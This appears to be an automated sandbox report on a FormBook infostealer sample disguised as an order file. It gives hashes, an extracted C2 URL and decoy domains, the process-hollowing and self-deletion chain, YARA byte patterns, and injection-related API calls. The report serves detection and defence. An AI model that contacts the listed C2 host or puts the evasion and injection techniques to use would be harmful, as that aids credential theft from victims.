Windows Analysis Report CNEW ORDER17.exe

Overview

General Information

Sample Name: CNEW ORDER17.exe
Analysis ID: 502245
MD5: c54edc9ef9d72fe0fe048e8ac884626b
SHA1: 11dce70f33e490eb9b89726776915a374bb59a59
SHA256: 43fcb442b80665d42271689310ebd569e84f74287063a62e14beba808178e098
Tags: exe, formbook

Detection

FormBook
Score: 100
Range: 0 - 100
Whitelisted: false
Confidence: 100%

Signatures

Found malware configuration
Yara detected FormBook
Malicious sample detected (through community Yara rule)
Antivirus / Scanner detection for submitted sample
Antivirus detection for dropped file
Sample uses process hollowing technique
Maps a DLL or memory area into another process
Initial sample is a PE file and has a suspicious name
Machine Learning detection for sample
Modifies the prolog of user mode functions (user mode inline hooks)
Self deletion via cmd delete
Queues an APC in another process (thread injection)
Tries to detect virtualization through RDTSC time measurements
Machine Learning detection for dropped file
Modifies the context of a thread in another process (thread injection)
C2 URLs / IPs found in malware configuration
Uses 32bit PE files
Queries the volume information (name, serial number etc) of a device
Yara signature match
Antivirus or Machine Learning detection for unpacked file
May sleep (evasive loops) to hinder dynamic analysis
Uses code obfuscation techniques (call, push, ret)
Detected potential crypto function
Sample execution stops while process was sleeping (likely an evasion)
Contains functionality to call native functions
Contains functionality for execution timing, often used to detect debuggers
Contains long sleeps (>= 3 min)
Enables debug privileges
Creates a DirectInput object (often for capturing keystrokes)
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Found inlined nop instructions (likely shell or obfuscated code)
Sample file is different than original file name gathered from version info
PE file contains strange resources
Drops PE files
Contains functionality to read the PEB
Checks if the current process is being debugged
Binary contains a suspicious time stamp
Creates a process in suspended mode (likely to inject code)
Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)

Process Tree

  • System is w10x64
  • CNEW ORDER17.exe (PID: 4344 cmdline: 'C:\Users\user\Desktop\CNEW ORDER17.exe' MD5: C54EDC9EF9D72FE0FE048E8AC884626B)
    • CNEW ORDER17.exe (PID: 5680 cmdline: C:\Users\user\AppData\Local\Temp\CNEW ORDER17.exe MD5: C54EDC9EF9D72FE0FE048E8AC884626B)
      • explorer.exe (PID: 3352 cmdline: C:\Windows\Explorer.EXE MD5: AD5296B280E8F522A8A897C96BAB0E1D)
      • raserver.exe (PID: 4632 cmdline: C:\Windows\SysWOW64\raserver.exe MD5: 2AADF65E395BFBD0D9B71D7279C8B5EC)
        • cmd.exe (PID: 4476 cmdline: /c del 'C:\Users\user\AppData\Local\Temp\CNEW ORDER17.exe' MD5: F3BDBE3BB6F734E357235F4D5898582D)
          • conhost.exe (PID: 6628 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)
  • cleanup

Malware Configuration

Threatname: FormBook

{"C2 list": ["www.cursoukulelegospel.com/h0c4/"], "decoy": ["looknewly.com", "icha2016.com", "datnenhoalachn.xyz", "fark.ltd", "zjlj.site", "carpinteriacansino.com", "atozmp33.com", "oficialacesso.com", "tuningfrance.com", "rmm-mx96r.net", "outsidestyleshop.com", "eufundas.com", "a91furniture.com", "sfme.net", "englisch.coach", "wallacechen.info", "nyayeo.com", "jintongstore.com", "vanwerknaarwerk.info", "thekimlab.net", "morvirtualassistant.com", "ichatbengal.com", "doctors-technology.com", "mississippisms.com", "koopa.codes", "sproutheads.com", "gardenkitchenspa.com", "hoom.life", "wiselogistic.com", "appadaptor.com", "jumtix.xyz", "academiavirtualjjb.com", "pcmrmf.com", "hlsx069.com", "sunielkapoor.com", "truetaster.com", "rylautosales.com", "cgmobile.net", "www-inloggen-nl.info", "businesswebstrategy.net", "fetch-a-sg-hair-transplant.fyi", "paintingservicespune.com", "cakeeyes.net", "tandebrokers.com", "navigantcapitalpartners.com", "hubska.com", "foillaws.com", "battletraining.com", "bitcoin-recovery.com", "yourbuildvideos.com", "naturalsumaq.com", "prasikapsychotherapy.com", "jphousecleaningservices.com", "fetch-hepatitis-c.zone", "easypay-agent.com", "ronaldcraig.com", "highonloveshop.com", "bayharborislandhouse2.com", "aventuramaker.com", "han-chill.com", "wrapmeupbkk.com", "videomarketing.tips", "ishouldntbthareasonugohard.com", "psychotherapie-wermuth.com"]}

Yara Overview

Memory Dumps

Source | Rule | Description | Author | Strings
00000010.00000000.455090898.00000000079B2000.00000040.00020000.sdmp | JoeSecurity_FormBook | Yara detected FormBook | Joe Security
    00000010.00000000.455090898.00000000079B2000.00000040.00020000.sdmp | Formbook_1 | autogenerated rule brought to you by yara-signator | Felix Bilstein - yara-signator at cocacoding dot com
    • 0x2685:$sequence_1: 3C 24 0F 84 76 FF FF FF 3C 25 74 94
    • 0x2171:$sequence_2: 3B 4F 14 73 95 85 C9 74 91
    • 0x2787:$sequence_3: 3C 69 75 44 8B 7D 18 8B 0F
    • 0x28ff:$sequence_4: 5D C3 8D 50 7C 80 FA 07
    • 0x13ec:$sequence_6: 57 89 45 FC 89 45 F4 89 45 F8
    • 0x84f7:$sequence_8: 3C 54 74 04 3C 74 75 F4
    • 0x94fa:$sequence_9: 56 68 03 01 00 00 8D 85 95 FE FF FF 6A 00
    00000010.00000000.455090898.00000000079B2000.00000040.00020000.sdmp | Formbook | detect Formbook in memory | JPCERT/CC Incident Response Group
    • 0x5419:$sqlite3step: 68 34 1C 7B E1
    • 0x552c:$sqlite3step: 68 34 1C 7B E1
    • 0x5448:$sqlite3text: 68 38 2A 90 C5
    • 0x556d:$sqlite3text: 68 38 2A 90 C5
    • 0x545b:$sqlite3blob: 68 53 D8 7F 8C
    • 0x5583:$sqlite3blob: 68 53 D8 7F 8C
    00000012.00000002.569532126.0000000000350000.00000004.00000001.sdmp | JoeSecurity_FormBook | Yara detected FormBook | Joe Security
      00000012.00000002.569532126.0000000000350000.00000004.00000001.sdmp | Formbook_1 | autogenerated rule brought to you by yara-signator | Felix Bilstein - yara-signator at cocacoding dot com
      • 0x98e8:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
      • 0x9b62:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
      • 0x15685:$sequence_1: 3C 24 0F 84 76 FF FF FF 3C 25 74 94
      • 0x15171:$sequence_2: 3B 4F 14 73 95 85 C9 74 91
      • 0x15787:$sequence_3: 3C 69 75 44 8B 7D 18 8B 0F
      • 0x158ff:$sequence_4: 5D C3 8D 50 7C 80 FA 07
      • 0xa57a:$sequence_5: 0F BE 5C 0E 01 0F B6 54 0E 02 83 E3 0F C1 EA 06
      • 0x143ec:$sequence_6: 57 89 45 FC 89 45 F4 89 45 F8
      • 0xb273:$sequence_7: 66 89 0C 02 5B 8B E5 5D
      • 0x1b4f7:$sequence_8: 3C 54 74 04 3C 74 75 F4
      • 0x1c4fa:$sequence_9: 56 68 03 01 00 00 8D 85 95 FE FF FF 6A 00

      Unpacked PEs

      Source | Rule | Description | Author | Strings
      15.2.CNEW ORDER17.exe.400000.0.unpack | JoeSecurity_FormBook | Yara detected FormBook | Joe Security
        15.2.CNEW ORDER17.exe.400000.0.unpack | Formbook_1 | autogenerated rule brought to you by yara-signator | Felix Bilstein - yara-signator at cocacoding dot com
        • 0x8ae8:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
        • 0x8d62:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
        • 0x14885:$sequence_1: 3C 24 0F 84 76 FF FF FF 3C 25 74 94
        • 0x14371:$sequence_2: 3B 4F 14 73 95 85 C9 74 91
        • 0x14987:$sequence_3: 3C 69 75 44 8B 7D 18 8B 0F
        • 0x14aff:$sequence_4: 5D C3 8D 50 7C 80 FA 07
        • 0x977a:$sequence_5: 0F BE 5C 0E 01 0F B6 54 0E 02 83 E3 0F C1 EA 06
        • 0x135ec:$sequence_6: 57 89 45 FC 89 45 F4 89 45 F8
        • 0xa473:$sequence_7: 66 89 0C 02 5B 8B E5 5D
        • 0x1a6f7:$sequence_8: 3C 54 74 04 3C 74 75 F4
        • 0x1b6fa:$sequence_9: 56 68 03 01 00 00 8D 85 95 FE FF FF 6A 00
        15.2.CNEW ORDER17.exe.400000.0.unpack | Formbook | detect Formbook in memory | JPCERT/CC Incident Response Group
        • 0x17619:$sqlite3step: 68 34 1C 7B E1
        • 0x1772c:$sqlite3step: 68 34 1C 7B E1
        • 0x17648:$sqlite3text: 68 38 2A 90 C5
        • 0x1776d:$sqlite3text: 68 38 2A 90 C5
        • 0x1765b:$sqlite3blob: 68 53 D8 7F 8C
        • 0x17783:$sqlite3blob: 68 53 D8 7F 8C
        15.2.CNEW ORDER17.exe.400000.0.raw.unpack | JoeSecurity_FormBook | Yara detected FormBook | Joe Security
          15.2.CNEW ORDER17.exe.400000.0.raw.unpack | Formbook_1 | autogenerated rule brought to you by yara-signator | Felix Bilstein - yara-signator at cocacoding dot com
          • 0x98e8:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
          • 0x9b62:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
          • 0x15685:$sequence_1: 3C 24 0F 84 76 FF FF FF 3C 25 74 94
          • 0x15171:$sequence_2: 3B 4F 14 73 95 85 C9 74 91
          • 0x15787:$sequence_3: 3C 69 75 44 8B 7D 18 8B 0F
          • 0x158ff:$sequence_4: 5D C3 8D 50 7C 80 FA 07
          • 0xa57a:$sequence_5: 0F BE 5C 0E 01 0F B6 54 0E 02 83 E3 0F C1 EA 06
          • 0x143ec:$sequence_6: 57 89 45 FC 89 45 F4 89 45 F8
          • 0xb273:$sequence_7: 66 89 0C 02 5B 8B E5 5D
          • 0x1b4f7:$sequence_8: 3C 54 74 04 3C 74 75 F4
          • 0x1c4fa:$sequence_9: 56 68 03 01 00 00 8D 85 95 FE FF FF 6A 00

          Sigma Overview

          No Sigma rule has matched

          Jbx Signature Overview

          AV Detection:

          Found malware configuration
          Source: 00000012.00000002.569532126.0000000000350000.00000004.00000001.sdmp, Malware Configuration Extractor: FormBook
          Yara detected FormBook
          Source: Yara match, File source: 15.2.CNEW ORDER17.exe.400000.0.unpack, type: UNPACKEDPE
          Source: Yara match, File source: 15.2.CNEW ORDER17.exe.400000.0.raw.unpack, type: UNPACKEDPE
          Source: Yara match, File source: 00000010.00000000.455090898.00000000079B2000.00000040.00020000.sdmp, type: MEMORY
          Source: Yara match, File source: 00000012.00000002.569532126.0000000000350000.00000004.00000001.sdmp, type: MEMORY
          Source: Yara match, File source: 00000000.00000002.424773076.0000000003719000.00000004.00000001.sdmp, type: MEMORY
          Source: Yara match, File source: 00000010.00000000.472604115.00000000079B2000.00000040.00020000.sdmp, type: MEMORY
          Source: Yara match, File source: 00000012.00000002.570686773.0000000002B40000.00000040.00020000.sdmp, type: MEMORY
          Source: Yara match, File source: 0000000F.00000002.519487969.0000000000B30000.00000040.00020000.sdmp, type: MEMORY
          Source: Yara match, File source: 00000000.00000002.424873904.00000000037B2000.00000004.00000001.sdmp, type: MEMORY
          Source: Yara match, File source: 0000000F.00000002.518976654.0000000000400000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara match, File source: 00000012.00000002.570839920.0000000002E40000.00000040.00020000.sdmp, type: MEMORY
          Source: Yara match, File source: 0000000F.00000002.519680465.0000000000F70000.00000040.00020000.sdmp, type: MEMORY
          Antivirus / Scanner detection for submitted sample
          Source: CNEW ORDER17.exe, Avira: detected
          Antivirus detection for dropped file
          Source: C:\Users\user\AppData\Local\Temp\CNEW ORDER17.exe, Avira: detection malicious, Label: HEUR/AGEN.1142543
          Machine Learning detection for sample
          Source: CNEW ORDER17.exe, Joe Sandbox ML: detected
          Machine Learning detection for dropped file
          Source: C:\Users\user\AppData\Local\Temp\CNEW ORDER17.exe, Joe Sandbox ML: detected
          Source: 15.2.CNEW ORDER17.exe.400000.0.unpack, Avira: Label: TR/Crypt.ZPACK.Gen
          Source: CNEW ORDER17.exe, Static PE information: 32BIT_MACHINE, EXECUTABLE_IMAGE
          Source: CNEW ORDER17.exe, Static PE information: NO_SEH, TERMINAL_SERVER_AWARE, DYNAMIC_BASE, NX_COMPAT
          Source: Binary string: wntdll.pdbUGP source: CNEW ORDER17.exe, 0000000F.00000002.519709359.0000000000FB0000.00000040.00000001.sdmp, raserver.exe, 00000012.00000002.571207765.000000000451F000.00000040.00000001.sdmp
          Source: Binary string: RAServer.pdb source: CNEW ORDER17.exe, 0000000F.00000002.521099012.0000000003030000.00000040.00020000.sdmp
          Source: Binary string: wntdll.pdb source: CNEW ORDER17.exe, 0000000F.00000002.519709359.0000000000FB0000.00000040.00000001.sdmp, raserver.exe
          Source: Binary string: RAServer.pdbGCTL source: CNEW ORDER17.exe, 0000000F.00000002.521099012.0000000003030000.00000040.00020000.sdmp
          Source: C:\Users\user\AppData\Local\Temp\CNEW ORDER17.exe, Code function: 4x nop then pop edi, 15_2_00416C93
          Source: C:\Windows\SysWOW64\raserver.exe, Code function: 4x nop then pop edi, 18_2_02E56C93

          Networking:

          C2 URLs / IPs found in malware configuration
          Source: Malware configuration extractor, URLs: www.cursoukulelegospel.com/h0c4/
          Source: CNEW ORDER17.exe, 0000000F.00000002.519538682.0000000000B7A000.00000004.00000020.sdmp, Binary or memory string: <HOOK MODULE="DDRAW.DLL" FUNCTION="DirectDrawCreateEx"/>

          E-Banking Fraud:

          Yara detected FormBook

          System Summary:

          Malicious sample detected (through community Yara rule)
          Source: 15.2.CNEW ORDER17.exe.400000.0.unpack, type: UNPACKEDPE, Matched rule: autogenerated rule brought to you by yara-signator, Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 15.2.CNEW ORDER17.exe.400000.0.unpack, type: UNPACKEDPE, Matched rule: detect Formbook in memory, Author: JPCERT/CC Incident Response Group
          Source: 15.2.CNEW ORDER17.exe.400000.0.raw.unpack, type: UNPACKEDPE, Matched rule: autogenerated rule brought to you by yara-signator, Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 15.2.CNEW ORDER17.exe.400000.0.raw.unpack, type: UNPACKEDPE, Matched rule: detect Formbook in memory, Author: JPCERT/CC Incident Response Group
          Source: 00000010.00000000.455090898.00000000079B2000.00000040.00020000.sdmp, type: MEMORY, Matched rule: autogenerated rule brought to you by yara-signator, Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 00000010.00000000.455090898.00000000079B2000.00000040.00020000.sdmp, type: MEMORY, Matched rule: detect Formbook in memory, Author: JPCERT/CC Incident Response Group
          Source: 00000012.00000002.569532126.0000000000350000.00000004.00000001.sdmp, type: MEMORY, Matched rule: autogenerated rule brought to you by yara-signator, Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 00000012.00000002.569532126.0000000000350000.00000004.00000001.sdmp, type: MEMORY, Matched rule: detect Formbook in memory, Author: JPCERT/CC Incident Response Group
          Source: 00000000.00000002.424773076.0000000003719000.00000004.00000001.sdmp, type: MEMORY, Matched rule: autogenerated rule brought to you by yara-signator, Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 00000000.00000002.424773076.0000000003719000.00000004.00000001.sdmp, type: MEMORY, Matched rule: detect Formbook in memory, Author: JPCERT/CC Incident Response Group
          Source: 00000010.00000000.472604115.00000000079B2000.00000040.00020000.sdmp, type: MEMORY, Matched rule: autogenerated rule brought to you by yara-signator, Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 00000010.00000000.472604115.00000000079B2000.00000040.00020000.sdmp, type: MEMORY, Matched rule: detect Formbook in memory, Author: JPCERT/CC Incident Response Group
          Source: 00000012.00000002.570686773.0000000002B40000.00000040.00020000.sdmp, type: MEMORY, Matched rule: autogenerated rule brought to you by yara-signator, Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 00000012.00000002.570686773.0000000002B40000.00000040.00020000.sdmp, type: MEMORY, Matched rule: detect Formbook in memory, Author: JPCERT/CC Incident Response Group
          Source: 0000000F.00000002.519487969.0000000000B30000.00000040.00020000.sdmp, type: MEMORY, Matched rule: autogenerated rule brought to you by yara-signator, Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 0000000F.00000002.519487969.0000000000B30000.00000040.00020000.sdmp, type: MEMORY, Matched rule: detect Formbook in memory, Author: JPCERT/CC Incident Response Group
          Source: 00000000.00000002.424873904.00000000037B2000.00000004.00000001.sdmp, type: MEMORY, Matched rule: autogenerated rule brought to you by yara-signator, Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 00000000.00000002.424873904.00000000037B2000.00000004.00000001.sdmp, type: MEMORY, Matched rule: detect Formbook in memory, Author: JPCERT/CC Incident Response Group
          Source: 0000000F.00000002.518976654.0000000000400000.00000040.00000001.sdmp, type: MEMORY, Matched rule: autogenerated rule brought to you by yara-signator, Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 0000000F.00000002.518976654.0000000000400000.00000040.00000001.sdmp, type: MEMORY, Matched rule: detect Formbook in memory, Author: JPCERT/CC Incident Response Group
          Source: 00000012.00000002.570839920.0000000002E40000.00000040.00020000.sdmp, type: MEMORY, Matched rule: autogenerated rule brought to you by yara-signator, Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 00000012.00000002.570839920.0000000002E40000.00000040.00020000.sdmp, type: MEMORY, Matched rule: detect Formbook in memory, Author: JPCERT/CC Incident Response Group
          Source: 0000000F.00000002.519680465.0000000000F70000.00000040.00020000.sdmp, type: MEMORY, Matched rule: autogenerated rule brought to you by yara-signator, Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 0000000F.00000002.519680465.0000000000F70000.00000040.00020000.sdmp, type: MEMORY, Matched rule: detect Formbook in memory, Author: JPCERT/CC Incident Response Group
          Initial sample is a PE file and has a suspicious name
          Source: initial sample, Static PE information: Filename: CNEW ORDER17.exe
          Source: CNEW ORDER17.exe, Static PE information: 32BIT_MACHINE, EXECUTABLE_IMAGE
          Source: 15.2.CNEW ORDER17.exe.400000.0.unpack, type: UNPACKEDPE, Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 15.2.CNEW ORDER17.exe.400000.0.unpack, type: UNPACKEDPE, Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 15.2.CNEW ORDER17.exe.400000.0.raw.unpack, type: UNPACKEDPE, Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 15.2.CNEW ORDER17.exe.400000.0.raw.unpack, type: UNPACKEDPE, Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 00000010.00000000.455090898.00000000079B2000.00000040.00020000.sdmp, type: MEMORY, Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 00000010.00000000.455090898.00000000079B2000.00000040.00020000.sdmp, type: MEMORY, Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 00000012.00000002.569532126.0000000000350000.00000004.00000001.sdmp, type: MEMORY, Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 00000012.00000002.569532126.0000000000350000.00000004.00000001.sdmp, type: MEMORY, Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 00000000.00000002.424773076.0000000003719000.00000004.00000001.sdmp, type: MEMORY, Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 00000000.00000002.424773076.0000000003719000.00000004.00000001.sdmp, type: MEMORY, Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 00000010.00000000.472604115.00000000079B2000.00000040.00020000.sdmp, type: MEMORY, Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 00000010.00000000.472604115.00000000079B2000.00000040.00020000.sdmp, type: MEMORY, Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 00000012.00000002.570686773.0000000002B40000.00000040.00020000.sdmp, type: MEMORY, Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 00000012.00000002.570686773.0000000002B40000.00000040.00020000.sdmp, type: MEMORY, Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 0000000F.00000002.519487969.0000000000B30000.00000040.00020000.sdmp, type: MEMORY, Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 0000000F.00000002.519487969.0000000000B30000.00000040.00020000.sdmp, type: MEMORY, Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 00000000.00000002.424873904.00000000037B2000.00000004.00000001.sdmp, type: MEMORY, Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 00000000.00000002.424873904.00000000037B2000.00000004.00000001.sdmp, type: MEMORY, Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 0000000F.00000002.518976654.0000000000400000.00000040.00000001.sdmp, type: MEMORY, Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 0000000F.00000002.518976654.0000000000400000.00000040.00000001.sdmp, type: MEMORY, Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 00000012.00000002.570839920.0000000002E40000.00000040.00020000.sdmp, type: MEMORY, Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 00000012.00000002.570839920.0000000002E40000.00000040.00020000.sdmp, type: MEMORY, Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 0000000F.00000002.519680465.0000000000F70000.00000040.00020000.sdmp, type: MEMORY, Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 0000000F.00000002.519680465.0000000000F70000.00000040.00020000.sdmp, type: MEMORY, Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: C:\Users\user\AppData\Local\Temp\CNEW ORDER17.exeCode function: 15_2_0041A060 NtClose,15_2_0041A060
          Source: C:\Users\user\AppData\Local\Temp\CNEW ORDER17.exeCode function: 15_2_0041A110 NtAllocateVirtualMemory,15_2_0041A110
          Source: C:\Users\user\AppData\Local\Temp\CNEW ORDER17.exeCode function: 15_2_00419F30 NtCreateFile,15_2_00419F30
          Source: C:\Users\user\AppData\Local\Temp\CNEW ORDER17.exeCode function: 15_2_00419FE0 NtReadFile,15_2_00419FE0
          Source: C:\Users\user\AppData\Local\Temp\CNEW ORDER17.exeCode function: 15_2_0041A05B NtClose,15_2_0041A05B
          Source: C:\Users\user\AppData\Local\Temp\CNEW ORDER17.exeCode function: 15_2_00419F2A NtCreateFile,15_2_00419F2A
          Source: C:\Users\user\AppData\Local\Temp\CNEW ORDER17.exeCode function: 15_2_00419FDA NtReadFile,15_2_00419FDA
          Source: C:\Users\user\AppData\Local\Temp\CNEW ORDER17.exeCode function: 15_2_00419F84 NtCreateFile,15_2_00419F84
          Source: C:\Windows\SysWOW64\raserver.exeCode function: 18_2_04469840 NtDelayExecution,LdrInitializeThunk,18_2_04469840
          Source: C:\Windows\SysWOW64\raserver.exeCode function: 18_2_04469860 NtQuerySystemInformation,LdrInitializeThunk,18_2_04469860
          Source: C:\Windows\SysWOW64\raserver.exeCode function: 18_2_04469540 NtReadFile,LdrInitializeThunk,18_2_04469540
          Source: C:\Windows\SysWOW64\raserver.exeCode function: 18_2_04469910 NtAdjustPrivilegesToken,LdrInitializeThunk,18_2_04469910
          Source: C:\Windows\SysWOW64\raserver.exeCode function: 18_2_044695D0 NtClose,LdrInitializeThunk,18_2_044695D0
          Source: C:\Windows\SysWOW64\raserver.exeCode function: 18_2_044699A0 NtCreateSection,LdrInitializeThunk,18_2_044699A0
          Source: C:\Windows\SysWOW64\raserver.exeCode function: 18_2_04469650 NtQueryValueKey,LdrInitializeThunk,18_2_04469650
          Source: C:\Windows\SysWOW64\raserver.exeCode function: 18_2_04469A50 NtCreateFile,LdrInitializeThunk,18_2_04469A50
          Source: C:\Windows\SysWOW64\raserver.exeCode function: 18_2_04469660 NtAllocateVirtualMemory,LdrInitializeThunk,18_2_04469660
          Source: C:\Windows\SysWOW64\raserver.exeCode function: 18_2_044696D0 NtCreateKey,LdrInitializeThunk,18_2_044696D0
          Source: C:\Windows\SysWOW64\raserver.exeCode function: 18_2_044696E0 NtFreeVirtualMemory,LdrInitializeThunk,18_2_044696E0
          Source: C:\Windows\SysWOW64\raserver.exeCode function: 18_2_04469710 NtQueryInformationToken,LdrInitializeThunk,18_2_04469710
          Source: C:\Windows\SysWOW64\raserver.exeCode function: 18_2_04469FE0 NtCreateMutant,LdrInitializeThunk,18_2_04469FE0
          Source: C:\Windows\SysWOW64\raserver.exeCode function: 18_2_04469780 NtMapViewOfSection,LdrInitializeThunk,18_2_04469780
          Source: C:\Windows\SysWOW64\raserver.exeCode function: 18_2_0446B040 NtSuspendThread,18_2_0446B040
          Source: C:\Windows\SysWOW64\raserver.exeCode function: 18_2_04469820 NtEnumerateKey,18_2_04469820
          Source: C:\Windows\SysWOW64\raserver.exeCode function: 18_2_044698F0 NtReadVirtualMemory,18_2_044698F0
          Source: C:\Windows\SysWOW64\raserver.exeCode function: 18_2_044698A0 NtWriteVirtualMemory,18_2_044698A0
          Source: C:\Windows\SysWOW64\raserver.exeCode function: 18_2_04469950 NtQueueApcThread,18_2_04469950
          Source: C:\Windows\SysWOW64\raserver.exeCode function: 18_2_04469560 NtWriteFile,18_2_04469560
          Source: C:\Windows\SysWOW64\raserver.exeCode function: 18_2_04469520 NtWaitForSingleObject,18_2_04469520
          Source: C:\Windows\SysWOW64\raserver.exeCode function: 18_2_0446AD30 NtSetContextThread,18_2_0446AD30
          Source: C:\Windows\SysWOW64\raserver.exeCode function: 18_2_044699D0 NtCreateProcessEx,18_2_044699D0
